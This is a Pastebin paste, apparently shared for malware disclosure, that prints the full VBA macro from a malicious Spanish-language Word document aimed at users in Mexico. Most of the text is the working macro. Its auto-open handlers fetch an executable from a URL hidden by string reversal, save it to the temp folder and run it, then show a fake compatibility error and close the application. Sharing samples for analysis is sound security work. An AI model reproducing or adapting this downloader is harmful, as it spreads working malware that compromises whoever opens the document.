Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious macro from Spanish-language Word document targeting users in Mexico
- See http://blog.dynamoo.com/2014/07/notificacion-de-transferencia-de-fondos.html
- -----------8x- CUT HERE --------------------------------
- Attribute VB_Name = "ThisDocument"
- Attribute VB_Base = "1Normal.ThisDocument"
- Attribute VB_GlobalNameSpace = False
- Attribute VB_Creatable = False
- Attribute VB_PredeclaredId = True
- Attribute VB_Exposed = True
- Attribute VB_TemplateDerived = True
- Attribute VB_Customizable = True
- Private Sub Auto_Open()
- Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
- End Sub
- Private Sub Workbook_Open()
- Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
- End Sub
- Private Sub AutoExec()
- Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
- End Sub
- Private Sub AutoOpen()
- Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
- End Sub
- Private Sub Document_Open()
- Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
- End Sub
- Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
- On Error Resume Next
- Err.Clear
- Set XML = CreateObject("Microsoft.XMLHTTP")
- Set ADS = CreateObject("ADODB.Stream")
- XML.Open "GET", URL, False
- XML.send
- XML.getAllResponseHeaders
- FullSavePath = Environ(SavePath) & "\" & SaveName
- ADS.Open
- ADS.Type = 1
- ADS.Write XML.responseBody
- ADS.SaveToFile FullSavePath, 2
- Shell FullSavePath, vbNormalFocus
- DownloadFile = True
- MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
- Dim z
- z = 0
- Do While 1 = 1
- If z = 2 Then
- Application.DisplayAlerts = False
- Application.Quit
- End If
- z = z + 1
- Loop
- End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement